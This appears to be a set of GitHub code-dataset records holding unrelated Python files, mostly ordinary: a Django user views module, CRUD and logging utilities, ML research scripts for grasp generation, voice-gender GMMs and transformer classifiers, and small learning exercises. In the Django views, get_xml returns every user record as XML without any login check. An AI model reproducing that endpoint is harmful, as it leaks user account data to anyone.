{'form': form}\n return render(request, 'home/index.html', context)\n\ndef sign_in(request):\n if request.method == 'POST':\n params = request.POST.copy()\n user = authenticate(username=params['username'], password=params['password'])\n \n if user is not None:\n #user.is_active = True\n #user.save()\n #print >>sys.stderr, user.is_active\n if user.is_active:\n login(request, user)\n #print >>sys.stderr, \"request.user\"\n #print >>sys.stderr, dir(request.user)\n print >>sys.stderr, request.user.__class__.__name__\n print >>sys.stderr, \"request.user.is_authenticated()\"\n print >>sys.stderr, request.user.is_authenticated()\n form_msg = _(\"welcome to Evolucion Web\")\n return render(request, 'users/_sign_in_success.html', {'form_msg': form_msg})\n else:\n form_msg = _(\"the user is not active\")\n return render(request, 'users/_sign_in_errors.html', {'form_msg': form_msg})\n \n else:\n form_msg = _(\"the username or password is not correct.\")\n return render(request, 'users/_sign_in_errors.html', {'form_msg': form_msg})\n\ndef user_logout(request):\n if request.method == 'POST':\n if request.user.is_authenticated():\n logout(request)\n response = redirect('/')\n response.delete_cookie('sessionid')\n return response\n\nclass UserEdit(generic.View):\n model = EvoUser\n form_class = UserForm\n template_name = 'users/edit.html'\n \n def get(self, request, *args, **kwargs):\n if request.user.is_authenticated():\n user = EvoUser.objects.get(pk=request.user.id)\n form = UserForm(instance=user, auto_id=True)\n \n context = self.get_context_data(**kwargs)\n context['user'] = request.user\n context['form'] = form\n \n return render(request, self.template_name, context)\n else:\n return redirect('/')\n \n \n def post(self, request, *args, **kwargs):\n #user = self.instance.user\n user = EvoUser.objects.get(pk=request.user.id)\n \n form_class = self.get_form_class()\n \n params = request.POST.copy()\n params['password'] = user.password\n params['created_at'] = user.created_at\n params['updated_at'] = timezone.now()\n params['date_joined']= user.date_joined\n params['last_login'] = user.last_login\n \n form = UserForm(data = params, instance=user, auto_id=True)\n \n if form.is_valid():\n user = form.save()\n form_msg = _(\"the user was successfully registered\")\n return render(request, 'users/_edit_success.html', {'form_msg': form_msg})\n else:\n form_errors = form.errors\n form_cleaned = form.cleaned_data\n return render(request, 'users/_edit_errors.html', {'form_errors': form_errors})\n \n #context = {}\n #context['user'] = user\n #context['form'] = form\n \n #return render(request, 'users/edit.html', context)\n \n #def form_valid(self, form):\n # This method is called when valid form data has been POSTed.\n # It should return an HttpResponse.\n # form.send_email()\n # return super(UserEdit, self).form_valid(form)\n\n\ndef edit(request):\n user = request.user\n context = {}\n \n if user.is_anonymous():\n form = UserForm(auto_id=True)\n context['form'] = form\n \n return render(request, 'users/edit.html', context)\n\ndef get_xml(request):\n users = EvoUser.objects.all()\n return HttpResponse(\n serializers.serialize(\"xml\", users),\n content_type = 'text/xml; charset=utf8')\n\ndef get_html(request):\n html = render(request, 'layouts/_footer.html', {})\n return html\n\n@ajax_view\ndef get_json(request):\n user = EvoUser.objects.get(pk=1)\n return user.username\n","repo_name":"johnciclus/evolucion","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5708,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"40089695992","text":"from sqlalchemy.orm import Session\nfrom schemes import food_cheme as scheme\nimport models\n\n\ndef get_by_id(db: Session, food_id: int):\n return db.query(models.Food).filter(models.Food.id == food_id).first()\n\n\ndef get_all(db: Session, skip: int = 0, limit: int = 100):\n return db.query(models.Food).offset(skip).limit(limit).all()\n\n\ndef create(db: Session, food: scheme.FoodBase):\n db_food = models.Food(name=food.name, description=food.description, calories=food.calories, carbs=food.carbs,\n fat=food.fat)\n db.add(db_food)\n db.commit()\n db.refresh(db_food)\n return db_food\n\n\ndef update(db: Session, food_id: int, food: scheme.FoodBase):\n db_food = get_by_id(db, food_id)\n db_food.name = food.name\n db_food.description = food.description\n db_food.calories = food.calories\n db_food.carbs = food.carbs\n db_food.fat = food.fat\n db_food.protein = food.protein\n db.commit()\n db.refresh(db_food)\n return db_food\n\n\ndef delete(db: Session, food_id: int):\n db_food = get_by_id(db, food_id)\n db.delete(db_food)\n db.commit()\n","repo_name":"DimkaPryg/fitnes_back","sub_path":"services/food_service.py","file_name":"food_service.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"123443408","text":"import os\nimport time\nimport torch\nimport argparse\nfrom torch.utils.data import DataLoader\nfrom dataset.HO3D_diversity_generation import HO3D_diversity\nfrom network.affordanceNet_obman_mano_vertex import affordanceNet\nfrom network.cmapnet_objhand import pointnet_reg\nimport numpy as np\nimport random\nfrom utils import utils, utils_loss\nimport mano\nimport json\nfrom utils.loss import TTT_loss\nimport trimesh\nfrom metric.simulate import run_simulation\n\n\ndef intersect_vox(obj_mesh, hand_mesh, pitch=0.5):\n '''\n Evaluating intersection between hand and object\n :param pitch: voxel size\n :return: intersection volume\n '''\n obj_vox = obj_mesh.voxelized(pitch=pitch)\n obj_points = obj_vox.points\n inside = hand_mesh.contains(obj_points)\n volume = inside.sum() * np.power(pitch, 3)\n return volume\n\ndef mesh_vert_int_exts(obj1_mesh, obj2_verts):\n inside = obj1_mesh.ray.contains_points(obj2_verts)\n sign = (inside.astype(int) * 2) - 1\n return sign\n\n\ndef main(args, model, cmap_model, eval_loader, device, rh_mano, rh_faces):\n '''\n Generate diverse grasps for object index with args.obj_id in out-of-domain HO3D object models\n '''\n model.eval()\n cmap_model.eval()\n rh_mano.eval()\n for batch_idx, (obj_id, obj_pc, origin_verts, origin_faces) in enumerate(eval_loader):\n if obj_id.item() != args.obj_id:\n continue\n obj_xyz = obj_pc.permute(0,2,1)[:,:,:3].squeeze(0).cpu().numpy() # [3000, 3]\n origin_verts = origin_verts.squeeze(0).numpy() # [N, 3]\n recon_params, R_list, trans_list, r_list = [], [], [], []\n\n for i in range(1000000):\n # generate random rotation\n rot_angles = np.random.random(3) * np.pi * 2\n theta_x, theta_y, theta_z = rot_angles[0], rot_angles[1], rot_angles[2]\n Rx = np.array([[1, 0, 0], [0, np.cos(theta_x), -np.sin(theta_x)], [0, np.sin(theta_x), np.cos(theta_x)]])\n Ry = np.array([[np.cos(theta_y), 0, np.sin(theta_y)], [0, 1, 0], [-np.sin(theta_y), 0, np.cos(theta_y)]])\n Rz = np.array([[np.cos(theta_z), -np.sin(theta_z), 0], [np.sin(theta_z), np.cos(theta_z), 0], [0, 0, 1]])\n rot = Rx @ Ry @ Rz # [3, 3]\n # generate random translation\n trans = np.array([-0.0793, 0.0208, -0.6924]) + np.random.random(3) * 0.2\n trans = trans.reshape((3, 1))\n R = np.hstack((rot, trans)) # [3, 4]\n obj_xyz_transformed = np.matmul(R[:3,0:3], obj_xyz.copy().T) + R[:3,3].reshape(-1,1) # [3, 3000]\n obj_mesh_verts = (np.matmul(R[:3,0:3], origin_verts.copy().T) + R[:3,3].reshape(-1,1)).T # [N, 3]\n obj_xyz_transformed = torch.tensor(obj_xyz_transformed, dtype=torch.float32)\n obj_pc_transformed = obj_pc.clone()\n obj_pc_transformed[0, :3, :] = obj_xyz_transformed # [1, 4, N]\n\n obj_pc_TTT = obj_pc_transformed.detach().clone().to(device)\n recon_param = model.inference(obj_pc_TTT).detach() # recon [1,61] mano params\n recon_param = torch.autograd.Variable(recon_param, requires_grad=True)\n optimizer = torch.optim.SGD([recon_param], lr=0.00000625, momentum=0.8)\n\n for j in range(300): # non-learning based optimization steps\n optimizer.zero_grad()\n\n recon_mano = rh_mano(betas=recon_param[:, :10], global_orient=recon_param[:, 10:13],\n hand_pose=recon_param[:, 13:58], transl=recon_param[:, 58:])\n recon_xyz = recon_mano.vertices.to(device) # [B,778,3], hand vertices\n\n # calculate cmap from current hand\n obj_nn_dist_affordance, _ = utils_loss.get_NN(obj_pc_TTT.permute(0, 2, 1)[:, :, :3], recon_xyz)\n cmap_affordance = utils.get_pseudo_cmap(obj_nn_dist_affordance) # [B,3000]\n\n # predict target cmap by ContactNet\n recon_cmap = cmap_model(obj_pc_TTT[:, :3, :], recon_xyz.permute(0, 2, 1).contiguous()) # [B,3000]\n recon_cmap = (recon_cmap / torch.max(recon_cmap, dim=1)[0]).detach()\n\n penetr_loss, consistency_loss, contact_loss = TTT_loss(recon_xyz, rh_faces,\n obj_pc_TTT[:, :3, :].permute(0,2,1).contiguous(),\n cmap_affordance, recon_cmap)\n loss = 1 * contact_loss + 1 * consistency_loss + 7 * penetr_loss\n loss.backward()\n optimizer.step()\n if j == 0 or j == 299:\n print(\"Object sample {}, pose {}, iter {}, \"\n \"penetration loss {:9.5f}, \"\n \"consistency loss {:9.5f}, \"\n \"contact loss {:9.5f}\".format(batch_idx, i, j,\n penetr_loss.item(), consistency_loss.item(), contact_loss.item()))\n\n # evaluate grasp\n cam_extr = np.array([[1., 0., 0., 0.], [0., -1., 0., 0.], [0., 0., -1., 0.]]).astype(np.float32)\n obj_mesh_verts = obj_mesh_verts.dot(cam_extr[:3,:3].T) # [N,3]\n obj_mesh = trimesh.Trimesh(vertices=obj_mesh_verts,\n faces=origin_faces.squeeze(0).cpu().numpy().astype(np.int32)) # obj\n final_mano = rh_mano(betas=recon_param[:, :10], global_orient=recon_param[:, 10:13],\n hand_pose=recon_param[:, 13:58], transl=recon_param[:, 58:])\n final_mano_verts = final_mano.vertices.squeeze(0).detach().cpu().numpy() # [778, 3]\n final_mano_verts = final_mano_verts.dot(cam_extr[:3,:3].T)\n try:\n hand_mesh = trimesh.Trimesh(vertices=final_mano_verts, faces=rh_faces.cpu().numpy().reshape((-1, 3)))\n except:\n continue\n # penetration volume\n penetr_vol = intersect_vox(obj_mesh, hand_mesh, pitch=0.005)\n # contact\n penetration_tol = 0.005\n result_close, result_distance, _ = trimesh.proximity.closest_point(obj_mesh, final_mano_verts)\n sign = mesh_vert_int_exts(obj_mesh, final_mano_verts)\n nonzero = result_distance > penetration_tol\n exterior = [sign == -1][0] & nonzero\n contact = ~exterior\n sample_contact = contact.sum() > 0\n # simulation displacement\n vhacd_exe = \"/hand-object/v-hacd/build/linux/test/testVHACD\"\n try:\n simu_disp = run_simulation(final_mano_verts, rh_faces.reshape((-1, 3)),\n obj_mesh_verts, origin_faces.cpu().numpy().astype(np.int32).reshape((-1, 3)),\n vhacd_exe=vhacd_exe, sample_idx=i)\n except:\n simu_disp = 0.10\n save_flag = (penetr_vol < args.penetr_vol_thre) and (simu_disp < args.simu_disp_thre) and sample_contact\n print('generate id: {}, penetr vol: {}, simu disp: {}, contact: {}, save flag: {}'\n .format(i, penetr_vol, simu_disp, sample_contact, save_flag))\n if save_flag:\n print('generate id {} saved'.format(i))\n recon_params.append(recon_param.detach().cpu().numpy().tolist())\n R_list.append(R.tolist())\n trans_list.append(trans.tolist())\n r_list.append(np.array([theta_x, theta_y, theta_z]).tolist())\n\n if len(r_list) == args.num_grasp:\n break\n\n save_path = './diverse_grasp/ho3d/obj_id_{}.json'.format(int(obj_id.item()))\n data = {\n 'recon_params': recon_params,\n 'R_list': R_list,\n 'trans_list': trans_list,\n 'r_list': r_list\n }\n with open(save_path, 'w') as f:\n json.dump(data, f)\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n '''experiment setting'''\n parser.add_argument(\"--seed\", type=int, default=0)\n parser.add_argument(\"--batch_size\", type=int, default=1)\n parser.add_argument(\"--use_cuda\", type=int, default=1)\n parser.add_argument(\"--dataloader_workers\", type=int, default=32)\n '''affordance network information'''\n parser.add_argument(\"--affordance_model_path\", type=str, default='checkpoints/model_affordance_best_full.pth')\n parser.add_argument(\"--encoder_layer_sizes\", type=list, default=[1024, 512, 256])\n parser.add_argument(\"--decoder_layer_sizes\", type=list, default=[1024, 256, 61])\n parser.add_argument(\"--latent_size\", type=int, default=64)\n parser.add_argument(\"--obj_inchannel\", type=int, default=4)\n parser.add_argument(\"--condition_size\", type=int, default=1024)\n '''cmap network information'''\n parser.add_argument(\"--cmap_model_path\", type=str, default='checkpoints/model_cmap_best.pth')\n '''Generated graps information'''\n parser.add_argument(\"--obj_id\", type=int, default=6)\n # You can change the two thresholds to save the graps you want\n parser.add_argument(\"--penetr_vol_thre\", type=float, default=4e-6) # 4cm^3\n parser.add_argument(\"--simu_disp_thre\", type=float, default=0.03) # 3cm\n parser.add_argument(\"--num_grasp\", type=int, default=100) # number of grasps you want to generate\n args = parser.parse_args()\n assert args.obj_id in [3, 4, 6, 10, 11, 19, 21, 25, 35, 37]\n\n # device\n use_cuda = args.use_cuda and torch.cuda.is_available()\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n print(\"using device\", device)\n\n # network\n affordance_model = affordanceNet(obj_inchannel=args.obj_inchannel,\n cvae_encoder_sizes=args.encoder_layer_sizes,\n cvae_latent_size=args.latent_size,\n cvae_decoder_sizes=args.decoder_layer_sizes,\n cvae_condition_size=args.condition_size) # GraspCVAE\n cmap_model = pointnet_reg(with_rgb=False) # ContactNet\n\n # load pre-trained model\n checkpoint_affordance = torch.load(args.affordance_model_path, map_location=torch.device('cpu'))['network']\n affordance_model.load_state_dict(checkpoint_affordance)\n affordance_model = affordance_model.to(device)\n checkpoint_cmap = torch.load(args.cmap_model_path, map_location=torch.device('cpu'))['network']\n cmap_model.load_state_dict(checkpoint_cmap)\n cmap_model = cmap_model.to(device)\n\n # dataset\n dataset = HO3D_diversity()\n dataloader = DataLoader(dataset=dataset, batch_size=1, shuffle=False, num_workers=1)\n # mano hand model\n with torch.no_grad():\n rh_mano = mano.load(model_path='./models/mano/MANO_RIGHT.pkl',\n model_type='mano',\n use_pca=True,\n num_pca_comps=45,\n batch_size=1,\n flat_hand_mean=True).to(device)\n rh_faces = torch.from_numpy(rh_mano.faces.astype(np.int32)).view(1, -1, 3).to(device) # [1, 1538, 3], face indexes\n\n main(args, affordance_model, cmap_model, dataloader, device, rh_mano, rh_faces)\n\n","repo_name":"hwjiang1510/GraspTTA","sub_path":"gen_diverse_grasp_ho3d.py","file_name":"gen_diverse_grasp_ho3d.py","file_ext":"py","file_size_in_byte":11189,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"72"} +{"seq_id":"25939246892","text":"from datetime import datetime\nimport logging\nimport logging.config\n\n# 설정 파일 읽어오기\nlogging.config.fileConfig('PDF_table_extract/config/logging.conf')\n\n# 로거 생성\nlogger = logging.getLogger(__name__)\n\nfh = logging.FileHandler(\n 'PDF_table_extract/log/{:%Y-%m}.log'.format(datetime.now())\n)\nformatter = logging.Formatter(\n '%(asctime)s | %(levelname)-8s | %(lineno)04d | %(message)s'\n)\nfh.setFormatter(formatter)\nlogger.addHandler(fh)","repo_name":"TableExtractorPdf/PDF_table_extract","sub_path":"PDF_table_extract/utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"32245610170","text":"# a program that tests the compatibility between two people.\n#To work out the love score between two people:\n#Take both people's names and check for the number of times the letters in the word TRUE occurs. \n#Then check for the number of times the letters in the word LOVE occurs. \n#Then combine these numbers to make a 2 digit number.\n\n\nprint(\"Welcome to the Love Calculator!\")\nname1 = input(\"What is your name? \\n\")\nname2 = input(\"What is their name? \\n\")\n\nnameA = name1.lower()\nnameB = name2.lower()\n\n\nt = (nameA.count(\"t\") + nameB.count(\"t\"))\nr = (nameA.count(\"r\") + nameB.count(\"r\"))\nu = (nameA.count(\"u\") + nameB.count(\"u\"))\ne = (nameA.count(\"e\") + nameB.count(\"e\"))\nresult_1 = t + r + u + e\n\nl = (nameA.count(\"l\") + nameB.count(\"l\"))\no = (nameA.count(\"o\") + nameB.count(\"o\"))\nv = (nameA.count(\"v\") + nameB.count(\"v\"))\ne = (nameA.count(\"e\") + nameB.count(\"e\"))\nresult_2 = l + o + v + e\n\nlove_score_1 = str(result_1) + str(result_2)\nlove_score = int(love_score_1)\n\nif love_score < 10 or love_score > 90:\n print(f\"Your score is {love_score}, you go together like coke and mentos.\")\nelif love_score >= 40 and love_score <= 50:\n print(f\"Your score is {love_score}, you are alright together.\")\nelse:\n print(f\"Your score is {love_score}.\")\n\n\n#RENDAN_TOCHUKWU\n","repo_name":"onahafranco/100-days-python-bootcamp","sub_path":"Day_3/Exercise/love_calculator.py","file_name":"love_calculator.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19118176224","text":"import numpy as np\n\n\nclass Data:\n\n def __init__(self, n_train, n_test):\n\n self.n_train = n_train\n self.n_test = n_test\n\n\n def __repr__(self):\n\n desc_title = f\"Data object for non-parametric regresssion\"\n desc_n_train = \"\\nNumber of training samples: n_train = \" + str(self.n_train)\n desc_n_test = \"\\nNumber of testing samples: n_test = \" + str(self.n_test)\n\n desc = desc_title + desc_n_train + desc_n_test\n return desc\n\n\n def generate_x_deterministic(self, x_min, x_max):\n\n self.x_train = np.linspace(x_min, x_max, self.n_train)\n self.x_test = np.linspace(x_min, x_max, self.n_test)\n\n\n def generate_x_uniform_random(self, x_min, x_max):\n\n x_range = x_max - x_min\n x_train = x_min + (x_range * np.random.random(size=self.n_train))\n x_test = x_min + (x_range * np.random.random(size=self.n_test))\n\n self.x_train = np.sort(x_train)\n self.x_test = np.sort(x_test)\n\n\n def generate_mu_polynomial(self, coeffs):\n\n assert hasattr(self, \"x_train\"), \"Must generate x values before mu values\"\n\n n_coeffs = len(coeffs)\n monomials_train = np.zeros((self.n_train, n_coeffs))\n monomials_test = np.zeros((self.n_test, n_coeffs))\n\n for k in range(len(coeffs)):\n monomials_train[:,k] = self.x_train ** k\n monomials_test[:,k] = self.x_test ** k\n\n self.mu_train = np.sum(monomials_train * coeffs, axis=1)\n self.mu_test = np.sum(monomials_test * coeffs, axis=1)\n\n\n def generate_mu_topologist_sine_curve(self):\n\n x_min = min(np.amin(self.x_train), np.amin(self.x_test))\n x_max = max(np.amax(self.x_train), np.amax(self.x_test))\n x_range = x_max - x_min\n\n x_train_scaled = (self.x_train - x_min) / x_range\n x_test_scaled = (self.x_test - x_min) / x_range\n\n self.mu_train = 0.5 + 0.5 * np.sin((x_train_scaled+1)**6)\n self.mu_test = 0.5 + 0.5 * np.sin((x_test_scaled+1)**6)\n\n\n def generate_y_gaussian(self, sigma):\n\n self.eps_train = np.random.normal(scale=sigma, size=self.n_train)\n self.eps_test = np.random.normal(scale=sigma, size=self.n_test)\n\n self.y_train = self.eps_train + self.mu_train\n self.y_test = self.eps_test + self.mu_test\n\n\n def loo(self, index):\n\n loo_data = Data(self.n_train - 1, 1)\n\n loo_data.x_train = np.delete(self.x_train, [index])\n loo_data.mu_train = np.delete(self.mu_train, [index])\n loo_data.eps_train = np.delete(self.eps_train, [index])\n loo_data.y_train = np.delete(self.y_train, [index])\n\n loo_data.x_test = self.x_train[index]\n loo_data.mu_test = self.mu_train[index]\n loo_data.eps_test = self.eps_train[index]\n loo_data.y_test = self.y_train[index]\n\n return loo_data\n\n\n def k_fold(self, k_fold, index):\n\n np.random.seed(23049234)\n random_order = np.random.permutation(self.n_train)\n part_size = self.n_train // k_fold\n k_fold_partition = [i * part_size for i in range(k_fold)] + [self.n_train]\n k_fold_start = k_fold_partition[index]\n k_fold_end = k_fold_partition[index + 1]\n k_fold_n_train = self.n_train - (k_fold_end - k_fold_start)\n k_fold_n_test = k_fold_end - k_fold_start\n k_fold_test_indices = random_order[list(range(k_fold_start, k_fold_end))]\n\n k_fold_data = Data(k_fold_n_train, k_fold_n_test)\n\n k_fold_data.x_train = np.delete(self.x_train, k_fold_test_indices)\n k_fold_data.mu_train = np.delete(self.mu_train, k_fold_test_indices)\n k_fold_data.eps_train = np.delete(self.eps_train, k_fold_test_indices)\n k_fold_data.y_train = np.delete(self.y_train, k_fold_test_indices)\n\n k_fold_data.x_test = self.x_train[k_fold_test_indices]\n k_fold_data.mu_test = self.mu_train[k_fold_test_indices]\n k_fold_data.eps_test = self.eps_train[k_fold_test_indices]\n k_fold_data.y_test = self.y_train[k_fold_test_indices]\n\n return k_fold_data\n","repo_name":"WGUNDERWOOD/wgunderwood.github.io","sub_path":"_posts/local_polynomial_regression/data_generation.py","file_name":"data_generation.py","file_ext":"py","file_size_in_byte":3752,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"38194789957","text":"#IMPORT REQUIRED LIBRARIES\n\nimport os\nimport _pickle as cPickle\nimport numpy as np\nfrom scipy.io.wavfile import read\nfrom sklearn.mixture import GaussianMixture\nimport python_speech_features as MFCC\nfrom sklearn import preprocessing\nimport warnings\n\n#GENERAL WARNING FILTER IGNORES MATCHING WARNINGS\nwarnings.filterwarnings(\"ignore\")\n\n#TO GET MEL FREEQUENCY CEPSTRAL COEFFICIENTS OF THE AUDIO\ndef get_MFCC(sr,audio):\n \n #MFCC IS SUBSTITUE FOR python_speech_features CLASS. THIS CREATES A SHAPE FOR THE AUDIO \n features = MFCC.mfcc( audio , sr , 0.025 , 0.01 , 13 , appendEnergy = False )\n \n #TO STANDARDIZE ANY DATASET ALONG ANY AXIS\n features = preprocessing.scale(features)\n\n #RETURNS STANDARDIZED DATA\n return features\n\n#SOURCES OF AUDIO TRAINING FILE\n#FOR DIFFERENT MODULES CLASSIFY EACH INTO SEPERATE LOCATION AND PROVIDE THE DATA ACCORDINGLY\n#HERE ONLY TWO MODULES SUCH AS MALE AND FEMALE ARE USED\n#RUN THIS PROGRAM WITH SOURCE DENOTING MALE AUDIO TRAININGS ONCE AND FEMALE AUDIO TRAININGS ONCE\n#THIS CREATES TWO DIFFERENT MODULES IN THE GIVEN DESTINATION\n#ONE IS MALE VOICE MODULE AND OTHER IS FEMALE VOICE MODULE\n\nsource = \"/home/siva/GenderClassification/Dataset/train_data/youtube/male\"\n\n#DESTINATION LOCATION TO STORE MODULES\ndest = \"/home/siva/GenderClassification/Modules/\"\n\n#COLLECT ALL THE FILES WHICH ARE TRAINING MODULE. HERE THE AUDIO FILE IS EXPECTED TO BE IN .wav FORMAT\n# files IS A LIST OF ONLY .wav FILES FROM THE PROVIDED SOURCE LOCATION\nfiles = [os.path.join(source,f) for f in os.listdir(source) if f.endswith('.wav')]\n\n#TO STORE RETURNED DATA FROM get_MFCC() FUNCTION\nfeatures = np.asarray(())\n\n#TO READ ALL TRAIN FILES, RUN A FOR LOOP ON THE COLLECTION\nfor f in files:\n \n #sr DENOTES SAMPLING RATE AND audio DENOTES THE SOURCE SIGNAL\n sr,audio = read(f)\n \n #vector STORES THE RETRUNED VALUE FROM THE get_MFCC() FUNCTION\n vector = get_MFCC(sr,audio)\n\n #FOR THE FIRST AUDIO SIGNAL features REMAINS EMPTY. SO ASSIGN THE RETURNED VALUE TO features\n if features.size == 0:\n features = vector\n else:\n #FOR THE FOLLOWING ITERATIONS DEVELOP features AS A VECTOR STACK \n features = np.vstack((features, vector)) \n\n#ONCE ALL TRAINING FILES ARE STACKED, CREATE A GAUSSIAN MIXTURE MODEL\ngmm = GaussianMixture(n_components = 8, covariance_type='diag', max_iter = 200 , n_init = 3 )\n\n#fit() ESTIMATES THE MODEL PARAMETERS USING THE EM ALGORITHM\ngmm.fit(features)\n\n#picklefile PROVIDES THE DESTINATION TO STORE THE .gmm FILE\npickleFile = f.split(\"/\")[-2].split(\".wav\")[0]+\".gmm\"\n\n#MODEL SAVED IN FILE BY dump() FUNCTION\ncPickle.dump(gmm,open(dest + pickleFile,'wb'))\n\nprint (\"Modeling Completed for Gender : \" + pickleFile)","repo_name":"sivajayaraman/Voice-Based-Gender-Detection","sub_path":"trainModels.py","file_name":"trainModels.py","file_ext":"py","file_size_in_byte":2709,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"17606487595","text":"import conf\nimport torch\nimport torch.nn as nn\n\ndimension_dictionary = {\n 'bert': 768,\n 'distilbert': 768,\n 'bert-tiny': 128,\n 'bert-mini': 256,\n 'bert-small': 512,\n 'bert-medium': 512,\n 'mobilebert': 512,\n 'bart': 1024,\n}\n\ndef load_backbone(name, output_attentions=False):\n if name == 'bert':\n from transformers import BertModel, BertTokenizer\n backbone = BertModel.from_pretrained('bert-base-uncased', output_attentions=output_attentions)\n tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')\n tokenizer.name = 'bert-base-uncased'\n elif name == 'distilbert':\n from transformers import DistilBertModel, DistilBertTokenizer\n backbone = DistilBertModel.from_pretrained('distilbert-base-uncased', output_attentions=output_attentions)\n tokenizer = DistilBertTokenizer.from_pretrained('distilbert-base-uncased')\n tokenizer.name = 'distilbert-base-uncased'\n elif name in ['bert-tiny', 'bert-mini', 'bert-small', 'bert-medium']:\n from transformers import AutoModel, AutoTokenizer\n backbone = AutoModel.from_pretrained(f'prajjwal1/{name}')\n tokenizer = AutoTokenizer.from_pretrained(f'prajjwal1/{name}')\n tokenizer.name = name\n elif name == 'mobilebert':\n from transformers import MobileBertModel\n from transformers import MobileBertTokenizer\n backbone = MobileBertModel.from_pretrained('google/mobilebert-uncased')\n tokenizer = MobileBertTokenizer.from_pretrained('google/mobilebert-uncased')\n tokenizer.name = 'mobilebert-uncased'\n elif name == 'bart':\n from transformers import BartModel\n from transformers import BartTokenizer\n backbone = BartModel.from_pretrained(\"facebook/bart-large\")\n tokenizer = BartTokenizer.from_pretrained(\"facebook/bart-large\")\n tokenizer.name = 'bart'\n else:\n raise ValueError('No matching backbone network')\n\n return backbone, tokenizer\n\nclass BaseNet(nn.Module):\n\n def __init__(self, model_name='', mode='base'):\n super(BaseNet, self).__init__()\n self.model_name = model_name\n\n if mode == \"base\":\n backbone, tokenizer = load_backbone(self.model_name)\n self.backbone = backbone\n self.tokenizer = tokenizer\n self.n_classes = conf.args.opt['num_class']\n self.dropout = nn.Dropout(0.1)\n\n dim = self.get_feat_dim(model_name)\n self.dense_layer = nn.Linear(dim, dim)\n self.class_layer = nn.Linear(dim, self.n_classes)\n\n def forward(self, x):\n if 'bert' in self.model_name:\n attention_mask = (x>0).float() # 0 is the pad_token for BERT family\n\n if self.model_name in ['bert', 'bert-tiny', 'bert-mini', 'bert-small', 'bert-medium', 'mobilebert']:\n out_h, out_p = self.backbone(x, attention_mask, return_dict=False) # hidden, pooled\n out_p = self.dropout(out_p)\n out_cls = self.class_layer(out_p)\n # https://github.com/huggingface/transformers/blob/v4.21.0/src/transformers/models/distilbert/modeling_distilbert.py#L689\n elif self.model_name in ['distilbert']:\n out_h = self.backbone(x, attention_mask)[0] # hidden state. (bs, seq_len, dim)\n out_p = out_h[:, 0] # (bs, dim)\n out_p = self.dense_layer(out_p) # (bs, dim)\n out_p = torch.nn.ReLU()(out_p) # (bs, dim)\n out_p = self.dropout(out_p) # (bs, dim)\n out_cls = self.class_layer(out_p) # (bs, num_labels) # TODO: include self.dense?\n elif 'bart' in self.model_name:\n attention_mask = (x > 0).float()\n out_h = self.backbone(x, attention_mask)[0] # hidden state. (bs, seq_len, dim)\n\n out_p = out_h[:, 0] # (bs, dim)\n out_p = self.dense_layer(out_p) # (bs, dim)\n out_p = torch.nn.ReLU()(out_p) # (bs, dim)\n out_p = self.dropout(out_p) # (bs, dim)\n out_cls = self.class_layer(out_p) # (bs, num_labels)\n return out_cls\n\n def get_feature(self, x): # used for LAME, which replaces the final classification layer\n if 'bert' in self.model_name:\n attention_mask = (x > 0).float() # 0 is the pad_token for BERT family\n\n if self.model_name in ['bert', 'bert-tiny', 'bert-mini', 'bert-small', 'bert-medium', 'mobilebert']:\n out_h, out_p = self.backbone(x, attention_mask, return_dict=False) # hidden, pooled\n out_p = self.dropout(out_p)\n # https://github.com/huggingface/transformers/blob/v4.21.0/src/transformers/models/distilbert/modeling_distilbert.py#L689\n elif self.model_name in ['distilbert']:\n out_h = self.backbone(x, attention_mask)[0] # hidden state. (bs, seq_len, dim)\n out_p = out_h[:, 0] # (bs, dim)\n out_p = self.dense_layer(out_p) # (bs, dim)\n out_p = torch.nn.ReLU()(out_p) # (bs, dim)\n out_p = self.dropout(out_p) # (bs, dim)\n\n return out_p\n\n def get_tokenizer(self):\n return self.tokenizer\n\n\n def get_feat_dim(self, model_name):\n return dimension_dictionary[model_name]\n\n def get_input_embeddings(self):\n return self.backbone.get_input_embeddings()\n\n def set_input_embeddings(self, embeddings):\n return self.backbone.set_input_embeddings(embeddings)\n\n\n def get_config(self):\n return self.backbone.config\n\n def set_backbone_gradient(self, bool):\n for params in self.backbone.parameters():\n params.requires_grad = bool","repo_name":"holymollyhao/cs470_intro_to_ai","sub_path":"models/BaseTransformer.py","file_name":"BaseTransformer.py","file_ext":"py","file_size_in_byte":5661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"16673867288","text":"\"\"\"\npyspark使用\n\"\"\"\nfrom pyspark import SparkConf, SparkContext\n\n# 创建sparkConf对象,local为本地,集群时需要多选\nconf = SparkConf().setMaster(\"local[*]\").setAppName(\"test_python_database\")\n\n# 为sparkConf创建sparkContext对象\nsc = SparkContext(conf=conf)\nrdd1 = sc.parallelize([1, 2, 3, 4, 5])\nrdd2 = sc.parallelize((1, 2, 3, 4, 5))\nrdd3 = sc.parallelize(\"test\")\nrdd4 = sc.parallelize({1, 2, 3, 4, 5})\nrdd5 = sc.parallelize({\"1\": \"1\", \"2\": \"2\", \"3\": \"3\", \"4\": \"4\"})\nprint(sc.version)\nprint(rdd1.collect())\nprint(rdd2.collect())\nprint(rdd3.collect())\nprint(rdd4.collect())\nprint(rdd5.collect())\n\n# 停止spark对象运行\nsc.stop()\n","repo_name":"BigRootMasters/python_learn","sub_path":"learn/learn_content/learn_pyspark.py","file_name":"learn_pyspark.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} 